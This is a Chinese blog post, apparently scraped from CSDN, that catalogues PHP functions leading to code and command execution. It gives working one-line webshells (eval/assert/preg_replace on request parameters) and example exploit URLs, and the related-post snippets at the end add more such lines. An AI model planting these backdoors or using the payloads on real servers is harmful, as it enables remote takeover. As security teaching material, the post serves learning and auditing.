php命令执行跟代码执行,php代码执行与命令执行漏洞

最新推荐文章于 2022-05-14 15:21:07 发布
最新推荐文章于 2022-05-14 15:21:07 发布
阅读量170 收藏
点赞数
文章标签: php命令执行跟代码执行

php代码执行与命令执行漏洞

学习php代码执行与命令执行漏洞,没有新姿势

php代码执行相关

eval()1mixed eval( string $code)

eval()函数把字符串按照php代码来计算,常见的一句话木马:1

2

3eval($_GET['cmd']); ?>

eval($_POST['cmd']); ?>

访问:1http://xxx.com/test.php?cmd=phpinfo();

得到phpinfo()页面。

assert()

php5:1bool assert( mixed $assertion[, string $description] )

php7:1bool assert( mixed $assertion[, Throwable $exception] )

assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动。

如果 assertion 是字符串,它将会被 assert() 当做 PHP 代码来执行。

普通调用:1

2

3assert($_GET['cmd']); ?>

assert($_POST['cmd']); ?>

访问:1http://xxx.com/test.php?cmd=phpinfo();

phpinfo()后可以不用分号,得到phpinfo页面。

assert函数支持动态调用:1

2

3

4$a = 'assert';

$a($_POST['a']);

?>

php官方在php7中更改了assert函数。在php7.0.29之后的版本不支持动态调用。

preg_replace()1mixed preg_replace( mixed $pattern, mixed $replacement, mixed $subject[, int $limit = -1[, int &$count]] )

preg_replace()在进行了对替换字符串的后向引用替换之后, 将替换后的字符串作为php代码评估执行(eval函数方式),并使用执行结果作为实际参与替换的字符串。单引号、双引号、反斜线()和 NULL 字符在后向引用替换时会被用反斜线转义.

第一个参数

第二个参数

一句话木马:1

2

3<?php

@preg_replace("/123/e",$_REQUEST['cmd'],"1234");

?>

访问:1http://xxx.com/test.php?cmd=phpinfo();

php 7.0.0 不再支持 /e修饰符

第三个参数

create_function()1string create_function( string $args, string $code)

用法:1create_function('$fname','echo $fname."Zhang"')

类似于:1

2

3function ($fname){

echo $fname."Zhang";

}

该函数的内部实现用到了eval,所以也具有相同的安全问题1

2

3

4

5<?php

$a = $_GET['cmd'];

$b = create_function('$a',"echo $a");

$b();

?>

访问:1http://xxx.com/test.php?cmd=phpinfo();

call_user_func()1mixed call_user_func( callable $callback[, mixed $parameter[, mixed $...]] )

第一个参数callback是被调用的回调函数,其余参数是回调函数的参数。 传入call_user_func()的参数不能为引用传递。1

2

3<?php

call_user_func($_GET['fun'],$_GET['exec']);

?>

访问:1http://xxx.com/test.php?fun=assert&exec=phpinfo()

eval()在这里是不能作为回调函数使用的。

在php中,可以通过is_callable来判断一个函数是否为回调函数,比如:1

2

3<?php

echo is_callable("eval") == false;

?>

call_user_func_array()1mixed call_user_func_array( callable $callback, array $param_arr)

把第一个参数作为回调函数(callback)调用,把参数数组作(param_arr)为回调函数的的参数传入。1

2

3<?php

call_user_func_array($_GET['fun'],$_GET['exec']);

?>

访问1http://xxx.com/test.php?fun=assert&exec[]=phpinfo()

array_map()1array array_map( callable $callback, array $array1[, array $...] )

返回数组,是为 array1 每个元素应用 callback函数之后的数组。callback 函数形参的数量和传给 array_map() 数组数量,两者必须一样。1

2

3

4

5

6<?php

$a = $_GET['a'];

$b = $_GET['b'];

$array[0] = $b;

$c = array_map($a,$array);

?>

访问:1http://xxx.com/test1.php?a=assert&b=phpinfo();

系统命令执行相关

system()1string system( string $command[, int &$return_var] )

command是要执行的命令。return_var,如果提供 return_var 参数, 则外部命令执行后的返回状态将会被设置到此变量中。

passthru()1void passthru( string $command[, int &$return_var] )

command是要执行的命令。return_var,如果提供 return_var 参数, Unix 命令的返回状态会被记录到此参数。

exec()1string exec( string $command[, array &$output[, int &$return_var]] )

exec() 执行 command 参数所指定的命令。 其余参数,见文档1

2

3<?php

echo exec("ls");

?>

返回值是命令执行结果的最后一行内容。

pcntl_exec()

shell_exec()1string shell_exec ( string $cmd )

popen()

proc_open()

`(反引号)

在php中称之为执行运算符,PHP 将尝试将反引号中的内容作为 shell 命令来执行,并将其输出信息返回(即,可以赋给一个变量而不是简单地丢弃到标准输出,使用反引号运算符“`”的效果与函数 shell_exec() 相同。

weixin_39655362
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
headerIP php,使用php运行ipconfig命令
weixin_42531163的博客
12-30 170
I use this code to understand some information of visitors (clients). It has been running on my virtual server on Xampp, but I can`t run on my main server (host). I see just a blank page.$info = syste...
php里面找出有用的代码,见面礼!精讲php代码执行命令执行漏洞
weixin_34621896的博客
03-09 66
文本独家广告赞助商:安全龙2013年申请的公众号,现在换了主体,并升级为服务号;5年之痒。创业就是坚定的目标,不断革新。只要与发展有关,就要不惜割掉旧的所谓积累,寻找跟好的路径。更像是在航海啊。新的安全龙公众号ID:safe443正文代码执行命令执行这两个漏洞的原理都差不多,还是分开来说。首先命令执行,比如系统的一些功能需要调用一些执行系统相关的函数时,但是对这些函数的传值没有过滤及防范,就造成...
php7 命令行运行环境,讲解Windows7下PHP7运行环境搭建
weixin_39778447的博客
03-10 288
php7号称能直追facebook的HHVM,为了体验一把传说中的高性能,我特意在本地电脑上尝试着安装了php7,不得不承认,php7的运行环境相对于之前的php5来说还是有一点苛刻的。下面开始进入主题。推荐(免费):PHP7一、环境准备1. windows7版本要求如果你用的是win7系统,必须确保你的系统上安装了SP1这个更新包,这个绝对是必要条件,如图:2. 下载php7需下载线程安全版的p...
CTF_ctfshow_web12
weixin_54227009的博客
05-14 1116
打开靶机,f12 发现有提示hit:cmd= 所以有个get传递的参数,变量为cmd 利用phpinfo();函数看一下php配置文件 ?cmd=phpinfo(); 可以看见版本信息这些 然后看一下当前目录下有哪些文件: ?cmd=print_r(glob("*")); print_r(glob("*")):直接打印出来当前目录下的所有文件 print_r(glob("*")):直接打印出来当前目录下的所有txt文件 Array ( [0] => 903c...
PHP代码执行函数总结
11-15 857
&#13;   PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。&#13;   常见代码执行函数,如  &#13;     eval()、assert()、preg_replace()、create_function()&#13;     array_map()、call_user_func()、call_user_fun...
PHP-CGI远程代码执行漏洞分析与防范
12-20
PHP-CGI远程代码执行漏洞分析与防范】 PHP-CGI远程代码执行漏洞是针对PHP运行模式中的CGI接口的一种安全缺陷,可能导致攻击者能够在服务器上执行任意代码,从而获取服务器控制权。该漏洞主要出现在PHP的CGI sapi...
02命令执行代码注入漏洞.pptx
09-23
这类漏洞的根本原因是程序在设计时没有遵循数据与代码分离的原则,允许用户可控的数据直接参与到代码执行过程中。例如,PHP中的`system`、`exec`和`passthru`函数,Java的`Runtime.getRuntime().exec(...)`,以及ASP...
文件包含、命令执行漏洞代码执行漏洞、基础代码审计
最新发布
09-26
文件包含、命令执行漏洞代码执行漏洞、基础代码审计 文件包含漏洞是指在开发过程中,开发人员将可重复使用的函数写入单个文件中,并在需要时调用该文件,而不是重新编写代码。这种调用文件的过程称为包含。文件...
【基础篇】第07篇:PHP代码审计笔记--命令执行漏洞1
08-03
PHP代码审计笔记--命令执行漏洞1】这篇文章主要讲解了PHP中的命令执行漏洞,这是一个严重的安全问题,允许攻击者通过浏览器在远程服务器上执行任意系统命令。与代码执行漏洞不同,命令执行漏洞更加专注于系统级别...
第一节 命令执行介绍-01
09-15
以下是一个存在命令执行漏洞的简单代码: <?php echo "<pre>"; if(isset($_GET["cmd"])){ system($_GET["cmd"]); } echo "</pre>"; ?> 这个代码中,攻击者可以通过 GET 请求的 cmd 参数来执行恶意命令,例如:...
1.2服务端漏洞——代码执行
The code way of kinnisoy
07-07 135
应用程序在调用一些能够将字符串转换为代码的函数(如PHP中的eval()函数) 代码执行 一句话木马shell.php: eval($_GET['cmd']); //从参数cmd获取任意代码执行 shell.php?cmd=phpinfo(); //将phpinfo作为参数 传进去shell脚本 执行 file_get_contents("/flag"); //读取flag文件内容 (返回值为内容 需要配合echo打印) file_put_contents("filename","da
PHP中可执行代码小结
菜鸟-传奇
02-28 872
PHP中可执行代码小结 PHP中可以执行代码的函数,常用于编写一句话木马,可能导致代码执行漏洞,这里对代码执行函数做一些归纳。   常见代码执行函数,如     eval()、assert()、preg_replace()、create_function()     array_map()、call_user_func()、call_user_func_array(),array_filt...
浅谈“phpinfo()信息泄漏”
热门推荐
→_→
06-29 1万+
一:漏洞名称: PHPInfo信息泄漏、phpinfo()函数信息泄漏 描述: PHPInfo函数信息泄露漏洞常发生一些默认的安装包,比如phpstudy等,默认安装完成后,没有及时删除这些提供环境测试的文件,比较常见的为phpinfo.php、1.php和test.php,虽然通过phpinfo获取的php环境以及变量等信息,但这些信息的泄露配合一些其它漏洞将有可能导致系统被渗透和提权。 phpinfo()函数返回的信息中包含了服务器的配置信息,包括: 1)PHP编译选项以及文件扩展名
web渗透--46--不安全的对象引用
武天旭的博客
09-22 3362
1、漏洞描述 在有不安全直接对象引用漏洞的情况下,通过修改用于直接检索对象的参数的值,攻击者就可以绕过授权对资源进行访问。被访问的资源甚至可以完全属于其他用户,也可以是系统文件等。该漏洞是应用程序未做充分授权检查的情况下,使用用户提供的输入数据对对象进行检索造成的。
PHP版本问题 cmdPHP -v版本和PHPinfo的版本不同
ouxiaoxian的博客
11-22 1245
问题描述:用composer安装一个依赖包,但是一直报内存不足的错误,一开始以为是PHP.ini里面的“”memory_limit=24M”设置太小的问题,然后我就设置成1024,但是还是不行,我查资料发现有可能是PHP版本的问题,但是我本地的phpstudy和laravel框架的composer.json显示的版本都是PHP7.1,我打开cmd输出命令PHP -v 发现版本是PHP7.0,版本...
php+反序列化代码执行漏洞,PHP反序列化漏洞
weixin_30444517的博客
03-11 280
0x001 漏洞产生原理在反序列化的过程中自动触发了某些魔术方法。未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致XSS、代码执行、文件写入、文件读取等不可控后果。0x002 漏洞触发条件一般只能通过代码审计的方式挖掘该漏洞,寻找代码中unserialize()函数的变量可控,且PHP文件代码中存在可利用的类,同时类中具有魔术方法。0x003 PHP魔术方法__cons...
ctf命令执行小结
舞动的獾
10-04 4502
1.相关函数 eval函数eval函数能够将字符串当作命令执行 需要被执行的字符串 代码不能包含打开/关闭 PHP tags。比如, ‘echo “Hi!”;’ 不能这样传入: ‘<?php echo "Hi!"; ?>’。但仍然可以用合适的 PHP tag 来离开、重新进入 PHP 模式。比如 ‘echo “In PHP mode!”; ?>In HTML mode!<...
eval函数简介与PHP一句话木马剖析
weixin_44706754的博客
04-19 2025
eval函数简介与PHP一句话木马剖析 一、eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 二、eval函数的一般用法 <?php $string = "beautiful"; ...
PHP中的命令执行代码执行
qq_51754713的博客
10-04 3178
title: PHP中的命令执行代码执行 data: 2021-09-15 tags: CTF-web PHP中的命令执行代码执行 最近在复习之前学过得知识点。因为之前是0基础来学习的,所以很多东西可能是没有弄懂的。现在重新回顾一下命令执行这一块。学到了不少的知识。 然后题目的话全都是来源于CTFSHOW的web入门。 对我这种新手来说真是太友好了! 命令执行代码执行PHP中我们首先要搞清楚什么是代码执行,什么是命令执行。 通俗一点讲,代码执行执行PHP代码命令执行执行linux系统下.
PHP代码审计:代码执行漏洞深度剖析
"php代码审计-代码执行.pdf" 这篇文档主要探讨了PHP代码审计中的一个重要主题——代码执行,这是渗透测试中常见的安全问题。通过代码审计,开发者和安全专家可以识别并修复潜在的安全漏洞,防止恶意攻击者利用这些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值